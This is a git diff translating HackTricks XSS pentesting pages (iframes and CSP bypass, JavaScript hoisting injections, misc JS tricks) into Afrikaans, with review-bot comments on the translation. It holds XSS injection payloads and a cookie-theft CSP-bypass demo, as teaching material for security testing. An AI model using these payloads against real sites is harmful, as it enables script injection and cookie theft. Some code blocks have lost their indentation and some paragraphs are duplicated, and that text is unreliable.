rekenaar wat **oormatige hoeveelhede CPU- of skyfspasie verbruik**. Sulke kwesbaarhede kan beduidende newe-effekte hê, soos die webblaaier wat die webwerf se funksionaliteit beperk deur pogings om data in `localStorage` te stoor te verwerp of besige skripsies te beëindig. Sinks: - ```javascript requestFileSystem() RegExp() ``` - ## Dom Clobbering {% content-ref url="dom-clobbering.md" %} @@ -337,12 +309,12 @@ RegExp()
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**hacktricks-repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud-repo**](https://github.com/carlospolop/hacktricks-cloud).
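Review bot: in the `@@ -315,20` hunk the heading `### Weiering van Diens` does not match the table entry `Dienste weier` for the same section, and the `#denial-of-service` anchor the table uses matches neither translated heading; keep the three in sync. In the `@@ -337,12` footer hunk, `SUBSCRIPTION PLANS` is left in English inside an otherwise translated sentence, and the banner is rendered "van nul tot held" here but "vanaf nul tot held" in the next file's header; use the same wording for the shared banner.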
diff --git a/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md b/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md index ed6cf90df..a1c61deed 100644 --- a/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md +++ b/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md @@ -1,47 +1,46 @@ -# Iframes in XSS, CSP and SOP +# Iframes in XSS, CSP en SOP
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
## Iframes in XSS -There are 3 ways to indicate the content of an iframed page: +Daar is 3 maniere om die inhoud van 'n iframed-bladsy aan te dui: -* Via `src` indicating an URL (the URL may be cross origin or same origin) -* Via `src` indicating the content using the `data:` protocol -* Via `srcdoc` indicating the content - -**Accesing Parent & Child vars** +* Via `src` wat 'n URL aandui (die URL kan kruis-oorsprong of dieselfde oorsprong wees) +* Via `src` wat die inhoud aandui deur die `data:`-protokol te gebruik +* Via `srcdoc` wat die inhoud aandui +**Toegang tot ouer- en kindervariabele** ```html - + - - - - + + + + - + ``` 
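Review bot: the blank line between the last bullet (`+* Via `srcdoc` wat die inhoud aandui`) and `+**Toegang tot ouer- en kindervariabele**` is removed in this hunk, so under CommonMark/GitBook the bold line becomes a lazy continuation of that list item rather than a standalone label; restore the blank line. The blank line before the html code fence is dropped as well.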
@@ -52,44 +51,40 @@ var secret="child secret"; alert(parent.secret) ``` +As jy die vorige html via 'n http-bediener (soos `python3 -m http.server`) toegang gee, sal jy opmerk dat al die skripte uitgevoer sal word (aangesien daar geen CSP is wat dit voorkom nie). **Die ouer sal nie toegang hê tot die `secret` var binne enige ifram nie** en **slegs die iframes if2 & if3 (wat as dieselfde webwerf beskou word) kan toegang kry tot die geheim in die oorspronklike venster**.\ +Let daarop dat if4 as 'n "null" oorsprong beskou word. -If you access the previous html via a http server (like `python3 -m http.server`) you will notice that all the scripts will be executed (as there is no CSP preventing it)., **the parent won’t be able to access the `secret` var inside any iframe** and **only the iframes if2 & if3 (which are considered to be same-site) can access the secret** in the original window.\ -Note how if4 is considered to have `null` origin. - -### Iframes with CSP +### Iframes met CSP {% hint style="info" %} -Please, note how in the following bypasses the response to the iframed page doesn't contain any CSP header that prevents JS execution. +Let asseblief daarop hoe in die volgende omseilings die antwoord aan die iframed-bladsy geen CSP-kop bevat wat JS-uitvoering voorkom nie. 
{% endhint %} -The `self` value of `script-src` won’t allow the execution of the JS code using the `data:` protocol or the `srcdoc` attribute.\ -However, even the `none` value of the CSP will allow the execution of the iframes that put a URL (complete or just the path) in the `src` attribute.\ -Therefore it’s possible to bypass the CSP of a page with: - +Die `self`-waarde van `script-src` sal nie die uitvoering van die JS-kode met die `data:`-protokol of die `srcdoc`-eienskap toelaat nie.\ +Tog sal selfs die `none`-waarde van die CSP die uitvoering van die iframes toelaat wat 'n URL (volledig of net die pad) in die `src`-eienskap plaas.\ +Daarom is dit moontlik om die CSP van 'n bladsy te omseil met: ```html - + - - - - - + + + + + ``` - -Note how the **previous CSP only permits the execution of the inline script**.\ -However, **only `if1` and `if2` scripts are going to be executed but only `if1` will be able to access the parent secret**. +Let daarop hoe die **vorige CSP slegs die uitvoering van die inline skrip toelaat**.\ +Tog sal **slegs `if1` en `if2` skripte uitgevoer word, maar slegs `if1` sal toegang tot die ouer se geheim hê**. ![](<../../.gitbook/assets/image (627) (1) (1).png>) -Therefore, it’s possible to **bypass a CSP if you can upload a JS file to the server and load it via iframe even with `script-src 'none'`**. This can **potentially be also done abusing a same-site JSONP endpoint**. - -You can test this with the following scenario were a cookie is stolen even with `script-src 'none'`. Just run the application and access it with your browser: +Daarom is dit moontlik om **'n CSP te omseil as jy 'n JS-lêer na die bediener kan oplaai en dit via 'n iframe kan laai, selfs met `script-src 'none'`**. Dit kan **moontlik ook gedoen word deur 'n selfde-site JSONP-eindpunt te misbruik**. +Jy kan dit toets met die volgende scenario waar 'n koekie selfs met `script-src 'none'` gesteel word. 
Voer net die toepassing uit en besoek dit met jou webblaaier: ```python import flask from flask import Flask @@ -97,21 +92,19 @@ app = Flask(__name__) @app.route("/") def index(): - resp = flask.Response('') - resp.headers['Content-Security-Policy'] = "script-src 'self'" - resp.headers['Set-Cookie'] = 'secret=THISISMYSECRET' - return resp +resp = flask.Response('') +resp.headers['Content-Security-Policy'] = "script-src 'self'" +resp.headers['Set-Cookie'] = 'secret=THISISMYSECRET' +return resp @app.route("/cookie_s.html") def cookie_s(): - return "" +return "" if __name__ == "__main__": - app.run() +app.run() ``` - -### Other Payloads found on the wild - +### Ander vragmotors wat in die wild gevind is ```html 
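Review bot: the Flask example in the `@@ -97,21 +92,19 @@` hunk no longer parses. The `+` lines drop the four-space indentation under `def index():`, `def cookie_s():` and `if __name__ == "__main__":` (`+resp = flask.Response('')`, `+return ""`, `+app.run()`), which raises IndentationError in Python, so anyone copying the translated snippet gets a broken demo of the `script-src 'none'` bypass. A translation should leave fenced code byte-for-byte; restore the original indentation and keep the hunk limited to prose.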
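Review bot: typo in the translated paragraph of the `@@ -52,44 +51,40 @@` hunk: `binne enige ifram nie` should read `binne enige iframe nie`. In the same paragraph the source marks `null` as code (`considered to have \`null\` origin`) because it is the literal origin value the browser reports; the translation turns it into a quoted word (`'n "null" oorsprong`), so keep the code formatting there.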
@@ -120,31 +113,28 @@ if __name__ == "__main__": ``` +### Iframe sandkas -### Iframe sandbox +Die inhoud binne 'n iframe kan onderworpe word aan addisionele beperkings deur die gebruik van die `sandbox` eienskap. Standaard word hierdie eienskap nie toegepas nie, wat beteken dat daar geen beperkings in plek is nie. -The content within an iframe can be subjected to additional restrictions through the use of the `sandbox` attribute. By default, this attribute is not applied, meaning no restrictions are in place. +Wanneer dit gebruik word, plaas die `sandbox` eienskap verskeie beperkings op: -When utilized, the `sandbox` attribute imposes several limitations: - -- The content is treated as if it originates from a unique source. -- Any attempt to submit forms is blocked. -- Execution of scripts is prohibited. -- Access to certain APIs is disabled. -- It prevents links from interacting with other browsing contexts. -- Use of plugins via ``, ``, ``, or similar tags is disallowed. -- Navigation of the content's top-level browsing context by the content itself is prevented. -- Features that are triggered automatically, like video playback or auto-focusing of form controls, are blocked. - -The attribute's value can be left empty (`sandbox=""`) to apply all the aforementioned restrictions. Alternatively, it can be set to a space-separated list of specific values that exempt the iframe from certain restrictions. +- Die inhoud word hanteer asof dit afkomstig is van 'n unieke bron. +- Enige poging om vorms in te dien, word geblokkeer. +- Uitvoering van skripte is verbied. +- Toegang tot sekere API's is gedeaktiveer. +- Dit voorkom dat skakels met ander blaaikontekste interaksie hê. +- Die gebruik van plugins via ``, ``, ``, of soortgelyke etikette word nie toegelaat nie. +- Navigasie van die inhoud se top-vlak blaaikonteks deur die inhoud self word voorkom. +- Funksies wat outomaties geaktiveer word, soos video-afspeel of outomatiese fokus op vormbehelemente, word geblokkeer. 
+Die waarde van die eienskap kan leeg gelaat word (`sandbox=""`) om al die genoemde beperkings toe te pas. Alternatiewelik kan dit gestel word as 'n spasiëring-geskeide lys van spesifieke waardes wat die iframe vrystel van sekere beperkings. ```html ``` - ## Iframes in SOP -Check the following pages: +Kyk na die volgende bladsye: {% content-ref url="../postmessage-vulnerabilities/bypassing-sop-with-iframes-1.md" %} [bypassing-sop-with-iframes-1.md](../postmessage-vulnerabilities/bypassing-sop-with-iframes-1.md) @@ -164,12 +154,12 @@ Check the following pages:
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
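Review bot: in the `### Iframe sandkas` hunk (`@@ -120,31 +113,28 @@`), `vormbehelemente` is a typo for `vormbeheerelemente` (form controls) and `spasiëring-geskeide` should be `spasie-geskeide` (space-separated). The list of `sandbox` restrictions otherwise maps one-to-one onto the English source, and the `sandbox=""` example is unchanged, which is correct.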
diff --git a/pentesting-web/xss-cross-site-scripting/js-hoisting.md b/pentesting-web/xss-cross-site-scripting/js-hoisting.md index 6a273d359..65b471f51 100644 --- a/pentesting-web/xss-cross-site-scripting/js-hoisting.md +++ b/pentesting-web/xss-cross-site-scripting/js-hoisting.md @@ -2,48 +2,46 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-## Basic Information +## Basiese Inligting -In the JavaScript language, a mechanism known as **Hoisting** is described where declarations of variables, functions, classes, or imports are conceptually raised to the top of their scope before the code is executed. This process is automatically performed by the JavaScript engine, which goes through the script in multiple passes. +In die JavaScript-taal word 'n meganisme bekend as **Hoisting** beskryf waar verklarings van veranderlikes, funksies, klasse of invoere konseptueel na die bokant van hul omvang verhoog word voordat die kode uitgevoer word. Hierdie proses word outomaties deur die JavaScript-enjin uitgevoer, wat deur die skripsie in verskeie deurgange gaan. -During the first pass, the engine parses the code to check for syntax errors and transforms it into an abstract syntax tree. This phase includes hoisting, a process where certain declarations are moved to the top of the execution context. If the parsing phase is successful, indicating no syntax errors, the script execution proceeds. +Tydens die eerste deurgang ontleder die enjin die kode om te kyk vir sintaksisfoute en omskep dit in 'n abstrakte sintaksisboom. Hierdie fase sluit hoisting in, 'n proses waar sekere verklarings na die bokant van die uitvoerkonteks verskuif word. As die ontledingsfase suksesvol is, wat dui op geen sintaksisfoute nie, gaan die skripsie-uitvoering voort. -It is crucial to understand that: +Dit is noodsaaklik om te verstaan dat: -1. The script must be free of syntax errors for execution to occur. Syntax rules must be strictly adhered to. -2. The placement of code within the script affects execution due to hoisting, although the executed code might differ from its textual representation. +1. Die skripsie vry van sintaksisfoute moet wees vir uitvoering om plaas te vind. Sintaksisreëls moet streng nagekom word. +2. 
Die plasing van kode binne die skripsie beïnvloed uitvoering as gevolg van hoisting, alhoewel die uitgevoerde kode mag verskil van sy teksuele voorstelling. -#### Types of Hoisting +#### Tipes Hoisting -Based on the information from MDN, there are four distinct types of hoisting in JavaScript: +Gebaseer op die inligting van MDN, is daar vier onderskeie tipes hoisting in JavaScript: -1. **Value Hoisting**: Enables the use of a variable's value within its scope before its declaration line. -2. **Declaration Hoisting**: Allows referencing a variable within its scope before its declaration without causing a `ReferenceError`, but the variable's value will be `undefined`. -3. This type alters the behavior within its scope due to the variable's declaration before its actual declaration line. -4. The declaration's side effects occur before the rest of the code containing it is evaluated. - -In detail, function declarations exhibit type 1 hoisting behavior. The `var` keyword demonstrates type 2 behavior. Lexical declarations, which include `let`, `const`, and `class`, show type 3 behavior. Lastly, `import` statements are unique in that they are hoisted with both type 1 and type 4 behaviors. +1. **Value Hoisting**: Maak die gebruik van 'n veranderlike se waarde binne sy omvang moontlik voordat dit gedeclareer word. +2. **Declaration Hoisting**: Maak dit moontlik om na 'n veranderlike binne sy omvang te verwys voordat dit gedeclareer word sonder om 'n `ReferenceError` te veroorsaak, maar die waarde van die veranderlike sal `undefined` wees. +3. Hierdie tipe verander die gedrag binne sy omvang as gevolg van die verklaring van die veranderlike voor sy werklike verklaringslyn. +4. Die neveneffekte van die verklaring vind plaas voordat die res van die kode wat dit bevat, geëvalueer word. +In detail vertoon funksieverklarings tipe 1 hoisting-gedrag. Die `var` sleutelwoord toon tipe 2-gedrag. Lexikale verklarings, wat `let`, `const` en `class` insluit, toon tipe 3-gedrag. 
Laastens is `import`-verklarings uniek omdat hulle gehoist word met beide tipe 1- en tipe 4-gedrag. ## Scenarios -Therefore if you have scenarios where you can **Inject JS code after an undeclared object** is used, you could **fix the syntax** by declaring it (so your code gets executed instead of throwing an error): - +Daarom, as jy scenarios het waar jy **JS-kode kan inspuit nadat 'n ongedeklareerde voorwerp** gebruik is, kan jy die **sintaksis regmaak** deur dit te deklareer (sodat jou kode uitgevoer word in plaas van om 'n fout te veroorsaak): ```javascript // The function vulnerableFunction is not defined -vulnerableFunction('test', ''); +vulnerableFunction('test', ''); // You can define it in your injection to execute JS //Payload1: param='-alert(1)-'')%3b+function+vulnerableFunction(a,b){return+1}%3b '-alert(1)-''); function vulnerableFunction(a,b){return 1}; @@ -56,7 +54,7 @@ test'); function vulnerableFunction(a,b){ return 1 };alert(1) // If a variable is not defined, you could define it in the injection // In the following example var a is not defined function myFunction(a,b){ - return 1 +return 1 }; myFunction(a, '') @@ -70,7 +68,7 @@ var variable = new unexploitableClass(); // But you can actually declare it as a function, being able to fix the syntax with something like: function unexploitableClass() { - return 1; +return 1; } alert(1); ``` 
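Review bot: wording in the `@@ -2,48 +2,46 @@` hunk of js-hoisting.md: `skripsie` means a dissertation in Afrikaans, not a script; use `skrip` throughout (`Die skrip moet vry van sintaksisfoute wees`, `deur die skrip in verskeie deurgange gaan`). Also `ontleder die enjin die kode` should be `ontleed die enjin die kode` (verb, not noun). The technical content (the four MDN hoisting types and their mapping to function declarations, `var`, lexical declarations and `import`) is translated faithfully.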
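Review bot: the `@@ -56,7 +54,7 @@` and `@@ -70,7 +68,7 @@` hunks change only leading whitespace inside fenced JavaScript (`-    return 1` becomes `+return 1`). That is harmless to the JavaScript but it is not a translation, it hides the real changes in the diff, and the same stripping breaks the Python snippets elsewhere in this PR. Drop these hunks and leave code blocks untouched.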
@@ -82,16 +80,39 @@ alert(1); test.cookie('leo','INJECTION') test['cookie','injection'] ``` +## Meer Scenarios -## More Scenarios +### Scenario 1: Hoisting in JavaScript +### Scenario 1: Hoisting in JavaScript + +In JavaScript, hoisting is a behavior where variable and function declarations are moved to the top of their containing scope during the compilation phase. This means that you can use variables and functions before they are actually declared in your code. + +In JavaScript, hoisting is 'n gedrag waar variabele- en funksiedeklarasies na die boonste gedeelte van hul omvattende omvang verskuif word gedurende die samestellingsfase. Dit beteken dat jy veranderlikes en funksies kan gebruik voordat hulle werklik in jou kode verklaar word. + +For example, consider the following code: + +Byvoorbeeld, oorweeg die volgende kode: + +```javascript +console.log(x); // Output: undefined +var x = 5; +``` + +In this example, the variable `x` is declared and assigned a value of `5` after the `console.log` statement. However, when the code is executed, the output is `undefined`. This is because the variable declaration is hoisted to the top of the scope, but the assignment is not hoisted. Therefore, at the time of the `console.log` statement, the variable `x` exists but has not been assigned a value yet. + +In hierdie voorbeeld word die veranderlike `x` verklaar en 'n waarde van `5` toegeken na die `console.log`-verklaring. Wanneer die kode egter uitgevoer word, is die uitset `undefined`. Dit is omdat die veranderlike verklaring na die boonste gedeelte van die omvang verskuif word, maar die toekenning nie verskuif word nie. Daarom, op die tydstip van die `console.log`-verklaring, bestaan die veranderlike `x`, maar dit het nog nie 'n waarde gekry nie. + +This behavior can be leveraged in cross-site scripting (XSS) attacks to execute malicious code. 
By injecting JavaScript code that relies on hoisting, an attacker can manipulate the execution flow and potentially gain unauthorized access or perform other malicious actions. + +Hierdie gedrag kan benut word in kruis-webwerf-skripsie (XSS) aanvalle om skadelike kode uit te voer. Deur JavaScript-kode in te spuit wat afhanklik is van hoisting, kan 'n aanvaller die uitvoervloei manipuleer en moontlik ongemagtigde toegang verkry of ander skadelike aksies uitvoer. ```javascript // Undeclared var accessing to an undeclared method x.y(1,INJECTION) // You can inject alert(1));function x(){}// // And execute the allert with (the alert is resolved before it's detected that the "y" is undefined -x.y(1,alert(1));function x(){}//) +x.y(1,alert(1));function x(){}//) ``` ```javascript @@ -106,11 +127,11 @@ x.y.z("alert(1)");import {x} from "https://example.com/module.js"//") // The imported module: // module.js var x = { - y: { - z: function(param) { - eval(param); - } - } +y: { +z: function(param) { +eval(param); +} +} }; export { x }; @@ -123,23 +144,22 @@ export { x }; // And the same injection was replicated in the body URL to execute an alert try { - if(config){ - return; - } - // TODO handle missing config for: https://try-to-catch.glitch.me/"+` +if(config){ +return; +} +// TODO handle missing config for: https://try-to-catch.glitch.me/"+` let config;`-alert(1)`//`+" - } catch { - fetch("/error", { - method: "POST", - body: { - url:"https://try-to-catch.glitch.me/"+` +} catch { +fetch("/error", { +method: "POST", +body: { +url:"https://try-to-catch.glitch.me/"+` let config;`-alert(1)-`//`+"" - } - }) - } +} +}) +} ``` - -## References +## Verwysings * [https://jlajara.gitlab.io/Javascript\_Hoisting\_in\_XSS\_Scenarios](https://jlajara.gitlab.io/Javascript\_Hoisting\_in\_XSS\_Scenarios) * [https://developer.mozilla.org/en-US/docs/Glossary/Hoisting](https://developer.mozilla.org/en-US/docs/Glossary/Hoisting) @@ -147,14 +167,14 @@ let config;`-alert(1)-`//`+""
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
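Review bot: the `## Meer Scenarios` region of the `@@ -82,16 +80,39 @@` hunk contains duplicated, partly untranslated material that is not in the English source: `### Scenario 1: Hoisting in JavaScript` appears twice, each English paragraph is followed by its Afrikaans rendering, and a new `console.log(x); var x = 5;` example plus a closing paragraph about attackers gaining unauthorized access are inserted before the original `x.y(1,INJECTION)` block. The source has only the heading followed by the code, and the added example restates the `var` case already covered under `#### Tipes Hoisting`. Keep just `## Meer Scenarios` and remove the rest; the other changes in this region (`@@ -106,11 +127,11 @@`, `@@ -123,23 +144,22 @@`) are again whitespace-only edits to code and should be dropped as well.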
diff --git a/pentesting-web/xss-cross-site-scripting/other-js-tricks.md b/pentesting-web/xss-cross-site-scripting/other-js-tricks.md index a13c56eec..ec1e26c4b 100644 --- a/pentesting-web/xss-cross-site-scripting/other-js-tricks.md +++ b/pentesting-web/xss-cross-site-scripting/other-js-tricks.md @@ -1,21 +1,20 @@ -# Misc JS Tricks & Relevant Info +# Verskillende JS-truuks & relevante inligting
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**hacktricks-repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud-repo**](https://github.com/carlospolop/hacktricks-cloud).
